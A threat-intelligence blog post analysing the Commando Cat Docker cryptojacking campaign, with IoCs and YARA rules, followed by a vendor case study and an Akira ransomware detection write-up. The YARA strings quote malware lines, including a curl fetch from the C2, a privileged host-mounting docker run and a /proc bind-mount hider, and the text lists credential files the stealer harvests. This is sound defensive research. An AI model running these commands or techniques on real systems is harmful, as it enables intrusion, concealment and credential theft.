Blog
/
/
January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
02
Jan 2024

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando cat

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet by the IP 45[.]9.148.193 (which is the same as C2). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.” 

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Figure 1: Container with custom command to execute

It uses the chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • Dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear - this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Figure 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is that they will rename these binaries to evade detection, likely the attacker is anticipating that this box was previously infected by a campaign that renamed the binaries to this, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2, this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Figure 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH key into the root user’s authorized_keys file:

function make_ssh_backdoor
Figure 4

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile variable to a local variable named “$hidden_authorized_keys”, however this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely as an attempt to appear as legitimate. To continue this theme, the attacker also has opted to set the login shell for the “games” user as /usr/bin/nologin. This is not the path for the real nologin binary, and is instead a copy of bash placed here by the malware. This makes the “games” user appear as a regular service account, while actually being a backdoor.

Games user
Figure 5

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Figure 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].
The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, to then connect to the infected machine.

Script
Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Figure 9

This script works by cloning the Linux mtab file (a list of the active mounts) to another directory. It then creates a new bind mount for the /proc/pid directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/pid directory to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. It’s purpose is likely for acting as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way - in order for nodes to find each other, they use their shared secret instead of IP address using the  service. This permits gs-netcat to function in virtually every environment as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victims IP and hostname:

Script
Figure 10

This is more acceptable than tsh from a security point of view, there are 4 billion possible IP addresses and many more possible hostnames, making a brute force harder, although still possible by using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly to note, the attacker will use the cmd.cat containers to untar the downloaded payload, if tar is not available on the system or fails. Instead of using /tmp, it also uses /dev/shm instead, which acts as a temporary file store, but memory backed instead. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. This also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor - a high-profile Linux campaign [6].

Script
Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however not all systems use systemd, resulting in this payload being rendered entirely ineffective on these systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as IMDS, and environment variables. Interestingly, the script creates a file so that once the script runs the first time, it can never be run again as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as making the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7.] However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber script. Firstly, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script taking a long time to run on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so can be rendered ineffective by enforcing IMDSv2.

Script
Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, are then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Figure 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their name, and the results appended to a temporary file, before the final concatenation of the credentials files is read back into the CSOF variable.

CSOF variable
Figure 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads out their environment variables into CSOF. This is interesting as the payload already checks the environment variables in a lot of cases, such as in the aws, google, and azure grabbers. So, it is unclear why they grab all data, but then grab specific portions of the data again.

Code
Figure 19

Regardless of what data it has already grabbed, get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber, where it checks for the existence of a variable and then appends its contents (or the file’s contents if the variable is path) to CSOF.

Code
Figure 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. Firstly, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command that contains chroot (which is the initial command used by this payload).

Code
Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops & disables the services. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying their own miner, so that they aren't competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm .

Code
Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Figure 25

Next, it blackholes the docker registry by writing it's hostname to /etc/hosts with an IP of 0.0.0.0

Code
Figure 26

This completely blocks other attackers from pulling their images/tools onto the box, eliminating the risk of competition. Keeping the Alpine image named as docker/firstrun allows the attacker to still use the docker API to spawn an alpine box they can use to break back in, as it is already downloaded so the blackhole has no effect.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 
meta: 

        description = "Detects CommandoCat aws.sh credential stealer script" 
 
        license = "Apache License 2.0" 
 
        date = "2024-01-25" 
 
        hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 
    strings: 
 
        // Constants 

        $const1 = "CRED_FILE_NAMES" 
 
        $const2 = "MIXED_CREDFILES" 
 
        $const3 = "AWS_CREDS_FILES" 
 
        $const4 = "GCLOUD_CREDS_FILES" 
 
        $const5 = "AZURE_CREDS_FILES" 
 
        $const6 = "VICOIP" 
 
        $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

AI

/

October 15, 2025

How a Major Civil Engineering Company Reduced MTTR across Network, Email and the Cloud with Darktrace

Default blog imageDefault blog image

Asking more of the information security team

“What more can we be doing to secure the company?” is a great question for any cyber professional to hear from their Board of Directors. After successfully defeating a series of attacks and seeing the potential for AI tools to supercharge incoming threats, a UK-based civil engineering company’s security team had the answer: Darktrace.

“When things are coming at you at machine speed, you need machine speed to fight it off – it’s as simple as that,” said their Information Security Manager. “There were incidents where it took us a few hours to get to the bottom of what was going on. Darktrace changed that.”

Prevention was also the best cure. A peer organization in the same sector was still in business continuity measures 18 months after an attack, and the security team did not want to risk that level of business disruption.

Legacy tools were not meeting the team’s desired speed or accuracy

The company’s native SaaS email platform took between two and 14 days to alert on suspicious emails, with another email security tool flagging malicious emails after up to 24 days. After receiving an alert, responses often took a couple of days to coordinate. The team was losing precious time.

Beyond long detection and response times, the old email security platform was no longer performing: 19% of incoming spam was missed. Of even more concern: 6% of phishing emails reached users’ inboxes, and malware and ransomware email was also still getting through, with 0.3% of such email-borne payloads reaching user inboxes.

Choosing Darktrace

“When evaluating tools in 2023, only Darktrace had what I was looking for: an existing, mature, AI-based cybersecurity solution. ChatGPT had just come out and a lot of companies were saying ‘AI this’ and ‘AI that’. Then you’d take a look, and it was all rules- and cases-based, not AI at all,” their Information Security Manager.

The team knew that, with AI-enabled attacks on the horizon, a cybersecurity company that had already built, fielded, and matured an AI-powered cyber defense would give the security team the ability to fend off machine-speed attacks at the same pace as the attackers.

Darktrace accomplishes this with multi-layered AI that learns each organization’s normal business operations. With this detailed level of understanding, Darktrace’s Self-Learning AI can recognize unusual activity that may indicate a cyber-attack, and works to neutralize the threat with precise response actions. And it does this all at machine speed and with minimal disruption.

On the morning the team was due to present its findings, the session was cancelled – for a good reason. The Board didn’t feel further discussion was necessary because the case for Darktrace was so conclusive. The CEO described the Darktrace option as ‘an insurance policy we can’t do without’.

Saving time with Darktrace / EMAIL

Darktrace / EMAIL reduced the discovery, alert, and response process from days or weeks to seconds .

Darktrace / EMAIL automates what was originally a time-consuming and repetitive process. The team has recovered between eight and 10 working hours a week by automating much of this process using / EMAIL.

Today, Darktrace / EMAIL prevents phishing emails from reaching employees’ inboxes. The volume of hostile and unsolicited email fell to a third of its original level after Darktrace / EMAIL was set up.

Further savings with Darktrace / NETWORK and Darktrace / IDENTITY

Since its success with Darktrace / EMAIL, the company adopted two more products from the Darktrace ActiveAI Security Platform – Darktrace / NETWORK and Darktrace / IDENTITY.

These have further contributed to cost savings. An initial plan to build a 24/7 SOC would have required hiring and retaining six additional analysts, rather than the two that currently use Darktrace, costing an additional £220,000 per year in salary. With Darktrace, the existing analysts have the tools needed to become more effective and impactful.

An additional benefit: Darktrace adoption has lowered the company’s cyber insurance premiums. The security team can reallocate this budget to proactive projects.

Detection of novel threats provides reassurance

Darktrace’s unique approach to cybersecurity added a key benefit. The team’s previous tool took a rules-based approach – which was only good if the next attack featured the same characteristics as the ones on which the tool was trained.

“Darktrace looks for anomalous behavior, and we needed something that detected and responded based on use cases, not rules that might be out of date or too prescriptive,” their Information Security Manager. “Our existing provider could take a couple of days to update rules and signatures, and in this game, speed is of the essence. Darktrace just does everything we need - without delay.”

Where rules-based tools must wait for a threat to emerge before beginning to detect and respond to it, Darktrace identifies and protects against unknown and novel threats, speeding identification, response, and recovery, minimizing business disruption as a result.

Looking to the future

With Darktrace in place, the UK-based civil engineering company team has reallocated time and resources usually spent on detection and alerting to now tackle more sophisticated, strategic challenges. Darktrace has also equipped the team with far better and more regularly updated visibility into potential vulnerabilities.

“One thing that frustrates me a little is penetration testing; our ISO accreditation mandates a penetration test at least once a year, but the results could be out of date the next day,” their Information Security Manager. “Darktrace / Proactive Exposure Management will give me that view in real time – we can run it daily if needed - and that’s going to be a really effective workbench for my team.”

As the company looks to further develop its security posture, Darktrace remains poised to evolve alongside its partner.

Continue reading
About the author
The Darktrace Community

Blog

/

Network

/

October 14, 2025

Inside Akira’s SonicWall Campaign: Darktrace’s Detection and Response

Default blog imageDefault blog image

Introduction: Background on Akira SonicWall campaign

Between July and August 2025, security teams worldwide observed a surge in Akira ransomware incidents involving SonicWall SSL VPN devices [1]. Initially believed to be the result of an unknown zero-day vulnerability, SonicWall later released an advisory announcing that the activity was strongly linked to a previously disclosed vulnerability, CVE-2024-40766, first identified over a year earlier [2].

On August 20, 2025, Darktrace observed unusual activity on the network of a customer in the US. Darktrace detected a range of suspicious activity, including network scanning and reconnaissance, lateral movement, privilege escalation, and data exfiltration. One of the compromised devices was later identified as a SonicWall virtual private network (VPN) server, suggesting that the incident was part of the broader Akira ransomware campaign targeting SonicWall technology.

As the customer was subscribed to the Managed Detection and Response (MDR) service, Darktrace’s Security Operations Centre (SOC) team was able to rapidly triage critical alerts, restrict the activity of affected devices, and notify the customer of the threat. As a result, the impact of the attack was limited - approximately 2 GiB of data had been observed leaving the network, but any further escalation of malicious activity was stopped.

Threat Overview

CVE-2024-40766 and other misconfigurations

CVE-2024-40766 is an improper access control vulnerability in SonicWall’s SonicOS, affecting Gen 5, Gen 6, and Gen 7 devices running SonicOS version 7.0.1 5035 and earlier [3]. The vulnerability was disclosed on August 23, 2024, with a patch released the same day. Shortly after, it was reported to be exploited in the wild by Akira ransomware affiliates and others [4].

Almost a year later, the same vulnerability is being actively targeted again by the Akira ransomware group. In addition to exploiting unpatched devices affected by CVE-2024-40766, security researchers have identified three other risks potentially being leveraged by the group [5]:

*The Virtual Office Portal can be used to initially set up MFA/TOTP configurations for SSLVPN users.

Thus, even if SonicWall devices were patched, threat actors could still target them for initial access by reusing previously stolen credentials and exploiting other misconfigurations.

Akira Ransomware

Akira ransomware was first observed in the wild in March 2023 and has since become one of the most prolific ransomware strains across the threat landscape [6]. The group operates under a Ransomware-as-a-Service (RaaS) model and frequently uses double extortion tactics, pressuring victims to pay not only to decrypt files but also to prevent the public release of sensitive exfiltrated data.

The ransomware initially targeted Windows systems, but a Linux variant was later observed targeting VMware ESXi virtual machines [7]. In 2024, it was assessed that Akira would continue to target ESXi hypervisors, making attacks highly disruptive due to the central role of virtualisation in large-scale cloud deployments. Encrypting the ESXi file system enables rapid and widespread encryption with minimal lateral movement or credential theft. The lack of comprehensive security protections on many ESXi hypervisors also makes them an attractive target for ransomware operators [8].

Victimology

Akira is known to target organizations across multiple sectors, most notably those in manufacturing, education, and healthcare. These targets span multiple geographic regions, including North America, Latin America, Europe and Asia-Pacific [9].

Geographical distribution of organization’s affected by Akira ransomware in 2025 [9].
Figure 1: Geographical distribution of organization’s affected by Akira ransomware in 2025 [9].

Common Tactics, Techniques and Procedures (TTPs) [7][10]

Initial Access
Targets remote access services such as RDP and VPN through vulnerability exploitation or stolen credentials.

Reconnaissance
Uses network scanning tools like SoftPerfect and Advanced IP Scanner to map the environment and identify targets.

Lateral Movement
Moves laterally using legitimate administrative tools, typically via RDP.

Persistence
Employs techniques such as Kerberoasting and pass-the-hash, and tools like Mimikatz to extract credentials. Known to create new domain accounts to maintain access.

Command and Control
Utilizes remote access tools including AnyDesk, RustDesk, Ngrok, and Cloudflare Tunnel.

Exfiltration
Uses tools such as FileZilla, WinRAR, WinSCP, and Rclone. Data is exfiltrated via protocols like FTP and SFTP, or through cloud storage services such as Mega.

Darktrace’s Coverage of Akira ransomware

Reconnaissance

Darktrace first detected of unusual network activity around 05:10 UTC, when a desktop device was observed performing a network scan and making an unusual number of DCE-RPC requests to the endpoint mapper (epmapper) service. Network scans are typically used to identify open ports, while querying the epmapper service can reveal exposed RPC services on the network.

Multiple other devices were also later seen with similar reconnaissance activity, and use of the Advanced IP Scanner tool, indicated by connections to the domain advanced-ip-scanner[.]com.

Lateral movement

Shortly after the initial reconnaissance, the same desktop device exhibited unusual use of administrative tools. Darktrace observed the user agent “Ruby WinRM Client” and the URI “/wsman” as the device initiated a rare outbound Windows Remote Management (WinRM) connection to two domain controllers (REDACTED-dc1 and REDACTED-dc2). WinRM is a Microsoft service that uses the WS-Management (WSMan) protocol to enable remote management and control of network devices.

Darktrace also observed the desktop device connecting to an ESXi device (REDACTED-esxi1) via RDP using an LDAP service credential, likely with administrative privileges.

Credential access

At around 06:26 UTC, the desktop device was seen fetching an Active Directory certificate from the domain controller (REDACTED-dc1) by making a DCE-RPC request to the ICertPassage service. Shortly after, the device made a Kerberos login using the administrative credential.

Figure 3: Darktrace’s detection of the of anomalous certificate download and subsequent Kerberos login.

Further investigation into the device’s event logs revealed a chain of connections that Darktrace’s researchers believe demonstrates a credential access technique known as “UnPAC the hash.”

This method begins with pre-authentication using Kerberos’ Public Key Cryptography for Initial Authentication (PKINIT), allowing the client to use an X.509 certificate to obtain a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC) instead of a password.

The next stage involves User-to-User (U2U) authentication when requesting a Service Ticket (ST) from the KDC. Within Darktrace's visibility of this traffic, U2U was indicated by the client and service principal names within the ST request being identical. Because PKINIT was used earlier, the returned ST contains the NTLM hash of the credential, which can then be extracted and abused for lateral movement or privilege escalation [11].

Flowchart of Kerberos PKINIT pre-authentication and U2U authentication [12].
Figure 4: Flowchart of Kerberos PKINIT pre-authentication and U2U authentication [12]
Figure 5: Device event log showing the Kerberos Login and Kerberos Ticket events

Analysis of the desktop device’s event logs revealed a repeated sequence of suspicious activity across multiple credentials. Each sequence included a DCE-RPC ICertPassage request to download a certificate, followed by a Kerberos login event indicating PKINIT pre-authentication, and then a Kerberos ticket event consistent with User-to-User (U2U) authentication.

Darktrace identified this pattern as highly unusual. Cyber AI Analyst determined that the device used at least 15 different credentials for Kerberos logins over the course of the attack.

By compromising multiple credentials, the threat actor likely aimed to escalate privileges and facilitate further malicious activity, including lateral movement. One of the credentials obtained via the “UnPAC the hash” technique was later observed being used in an RDP session to the domain controller (REDACTED-dc2).

C2 / Additional tooling

At 06:44 UTC, the domain controller (REDACTED-dc2) was observed initiating a connection to temp[.]sh, a temporary cloud hosting service. Open-source intelligence (OSINT) reporting indicates that this service is commonly used by threat actors to host and distribute malicious payloads, including ransomware [13].

Shortly afterward, the ESXi device was observed downloading an executable named “vmwaretools” from the rare external endpoint 137.184.243[.]69, using the user agent “Wget.” The repeated outbound connections to this IP suggest potential command-and-control (C2) activity.

Cyber AI Analyst investigation into the suspicious file download and suspected C2 activity between the ESXI device and the external endpoint 137.184.243[.]69.
Figure 6: Cyber AI Analyst investigation into the suspicious file download and suspected C2 activity between the ESXI device and the external endpoint 137.184.243[.]69.
Packet capture (PCAP) of connections between the ESXi device and 137.184.243[.]69.
Figure 7: Packet capture (PCAP) of connections between the ESXi device and 137.184.243[.]69.

Data exfiltration

The first signs of data exfiltration were observed at around 7:00 UTC. Both the domain controller (REDACTED-dc2) and a likely SonicWall VPN device were seen uploading approximately 2 GB of data via SSH to the rare external endpoint 66.165.243[.]39 (AS29802 HVC-AS). OSINT sources have since identified this IP as an indicator of compromise (IoC) associated with the Akira ransomware group, known to use it for data exfiltration [14].

